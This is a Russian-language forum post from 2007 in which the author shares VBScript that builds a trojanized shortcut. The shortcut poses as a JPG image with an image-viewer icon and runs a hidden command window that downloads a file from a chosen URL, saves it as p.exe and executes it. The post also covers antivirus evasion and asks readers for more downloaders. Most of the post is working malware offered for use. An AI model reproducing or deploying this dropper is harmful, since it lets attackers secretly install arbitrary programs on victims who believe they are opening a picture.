LNK-DownLoadeR

Discussion in 'Безопасность и Анонимность' started by GROB_T, 10 Apr 2007.

  1. GROB_T

    GROB_T Elder - Старейшина

    Joined:
    3 Mar 2007
    Messages:
    134
    Likes Received:
    50
    Reputations:
    6
    Сделал прогу, создающую ярлык, который скачает файл с указанного адреса, причем абсолютно незаметно, а потом запустит его, прога написана на vbs, вот код:

    a="http://"'Адрес
    Set WshShell=CreateObject("WScript.Shell")
    Set WshShortcut=WshShell.CreateShortcut("C:\DownLoader.jpg.lnk")'Путь к ярлыку
    WshShortcut.Arguments="/c echo Set o=CreateObject(""MSXML2.XMLHTTP""):eek:.Open""GET"","""&a&""",0:eek:.Send:Set a=CreateObject(""ADODB.Stream""):a.Mode=3:a.Type=1:a.Open:a.Write o.responseBody:a.SaveToFile""p.exe"",2 >a.vbs&&start /wait a.vbs&&start p.exe"
    WshShortcut.Description="DownLoader"'Описание ярлыка
    WshShortcut.IconLocation="shimgvw.dll, 3"'Иконка
    WshShortcut.TargetPath="%comspec%"
    WshShortcut.WindowStyle=0
    WshShortcut.WorkingDirectory="%Temp%"'Рабочая директория
    MsgBox "Протрояненный ярлык был успешно создан в: "&WshShortcut.FullName
    WshShortcut.Save

    Максимальная длина адреса - 37 символов

    Сам ярлык не палится антивирями, но он после запуска создает файл a.vbs, который определяется как downloader, можно конечно попробовать скрыть этот файл от антивирей, но на скрытие уйдет как минимум 25 байт, что уменбшит длинну адреса до 12 символов, что конечно же очень плохо, но я все таки попробую как-то устранить это, если кто-нить знает какой нибудь downloader на vbs, js, то напишите на мыло grob_t@mail.ru или в асю 444452117.
     
    1 person likes this.